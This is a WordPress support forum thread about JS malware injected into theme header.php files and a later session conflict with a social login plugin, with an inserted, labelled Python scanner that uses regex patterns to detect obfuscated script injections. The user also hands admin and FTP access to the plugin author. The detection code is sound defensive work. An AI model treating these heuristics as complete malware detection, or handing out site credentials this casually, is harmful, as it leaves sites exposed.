Viewing 15 replies - 1 through 15 (of 17 total)
  • Plugin Author Eli

    (@scheeeli)

    This looks like a new threat that is not in my definitions yet. If you would be willing to give me WP Admin access to one of your infected sites I will find this new threat and add it to my definition update so that it can be automatically removed.

    You can email the login directly to me: eli at gotmls dot net

    Aloha, Eli

    Thread Starter sonnycool

    (@sonnycool)

    I just solved it the very traditional way: I downloaded every folder from FTP to my desktop and my PC antivirus did the detecting job …

    Based on my desktop antivirus:
    virus name: JS/Expack.CM.3
    injected in all my theme header.php files.
    Hopefully I really solved it. Do you still need access to take a look?
    Thanks

    Suspected code provided by Google Webmaster:


    Thread Starter sonnycool

    (@sonnycool)

    Or you can visit here for details in their cache system:
    http://sitecheck.sucuri.net/results/douglasyeap.pgpropertyagent.com/
    The main site has already been rescanned without issue now ..

    Plugin Author Eli

    (@scheeeli)

    I would still like access to an infected site so I can see the infection in-place and test my own removal code. If you don’t have a site I can log in to, can you send me one of your infected header.php files?

    Thread Starter sonnycool

    (@sonnycool)

    I don’t have the files anymore (because my PC blocked them).

    I have added and created you as my site admin now; remember my site is WPMS 🙂
    Account created 🙂

    Thread Starter sonnycool

    (@sonnycool)

    Email you FTP access too 🙂

    Plugin Author Eli

    (@scheeeli)

    Thanks for the access but it looks like you have already cleaned the infection out of your header. Do you have any sites that are still infected with this threat?

    Thread Starter sonnycool

    (@sonnycool)

    Unfortunately no (lucky me) …
    I think the problem should be on scanning not DB, because I recall your scanner detected the virus in only one header.php file (I have 4 header.php), but the header.php it detected is in the only theme that is not being used at all ….
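
A check for the situation described in the post above, where only one of several header.php files was flagged. This is an added example, not part of the thread and not the plugin's code: it walks header.php in every theme directory of a downloaded copy, active or not, and flags script blocks that combine an aliased eval, a split "document" identifier, or a long run of underscore-separated hex pairs. The indicator patterns, the two-indicator threshold and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics are assumptions of this example, not the plugin's definitions.
INDICATORS = {
    "hex_run": re.compile(r"(?:[0-9a-f]{2}_){40,}[0-9a-f]{2}", re.I),
    "eval_alias": re.compile(r"\b\w+\s*=\s*eval\b"),
    "split_ident": re.compile(r"""["']doc["']\s*\+\s*["']ument["']"""),
}
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)(?:</script>|\Z)", re.I | re.S)


def scan_file(path):
    """Return sorted indicator names found inside <script> blocks of one file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    hits = set()
    for block in SCRIPT.findall(text):
        hits.update(n for n, rx in INDICATORS.items() if rx.search(block))
    return sorted(hits)


def scan_themes(themes_dir, min_hits=2):
    """Check header.php in every theme, active or not; map path -> indicators."""
    report = {}
    for header in sorted(Path(themes_dir).glob("*/header.php")):
        hits = scan_file(header)
        if len(hits) >= min_hits:
            report[str(header.relative_to(themes_dir))] = hits
    return report


def build_sample_tree(root):
    """Constructed sample: four themes, three carrying a harmless look-alike."""
    hex_blob = "_".join(f"{b:02x}" for b in b"harmless constructed sample " * 2)
    injected = f'<script type="text/javascript">e=eval;z="{hex_blob}";</script>\n'
    clean = "<html><head><?php wp_head(); ?></head>\n"
    for name, infected in [("alpha", True), ("beta", True), ("gamma", False), ("unused", True)]:
        theme = Path(root) / name
        theme.mkdir(parents=True)
        (theme / "header.php").write_text((injected if infected else "") + clean)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for path, hits in scan_themes(build_sample_tree(tmp)).items():
            print(path, hits)
```

To use it on real files, pass the path of the downloaded wp-content/themes folder to scan_themes and review each reported header.php by hand before deleting anything.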

    Plugin Author Eli

    (@scheeeli)

    Thanks for working with me on this and giving me access to your site. Based on the malicious code snippet you posted, and the files in your quarantine, I do think this malware is in my definitions already.

    Please keep a close eye on your site for a few days to make sure the infection does not come back. If you do get re-infected, and I hope you don’t, but if you do, please let me know right away and I will look for the source of the infection too.

    Aloha, Eli

    Thread Starter sonnycool

    (@sonnycool)

    Seems like your plugin conflicts with WP Social Login.
    I tried to diagnose it and think this is the issue:
    cookie saved here /public_html/wp-content/plugins/gotmls/images/

    Plugin Author Eli

    (@scheeeli)

    WordPress does not handle sessions well, and some servers I’ve found don’t even have a session path, so I have added this to the top of my gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    If this line is in fact causing an issue I will have to look for another way to fix the no-session issue. Can you rem out that line and let me know if it solves the issue?

    Also, what are the symptoms you are experiencing due to this conflict?

    Thread Starter sonnycool

    (@sonnycool)

    Symptoms:
    when clicking on social login, a new screen pops up -> redirects to this page: http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    with your plugin -> You cannot access this page directly.
    without your plugin -> redirects to social network API or login page.

    Below is my website info with and without your plugin:
    without (different part):

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    with your plugin:

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:                /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    Hope this helps ..

    Plugin Author Eli

    (@scheeeli)

    That message is from /public_html/wp-content/plugins/wordpress-social-login/hybridauth/Hybrid/Endpoint.php

    I was getting that error “You cannot access this page directly” with or without my plugin enabled. I tried remming out that first line of my plugin that changes the session path and nothing seems any different.

    Can you show me a working redirect without my plugin enabled so that I can see the difference?

    Thread Starter sonnycool

    (@sonnycool)

    You can visit my site; I just tried, it is working now 🙂

    Plugin Author Eli

    (@scheeeli)

    When I go to:
    http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    I still get:
    “You cannot access this page directly.”

    What URL can I use to see it working like you see it?

  • The topic ‘some virus block me to access the site’ is closed to new replies.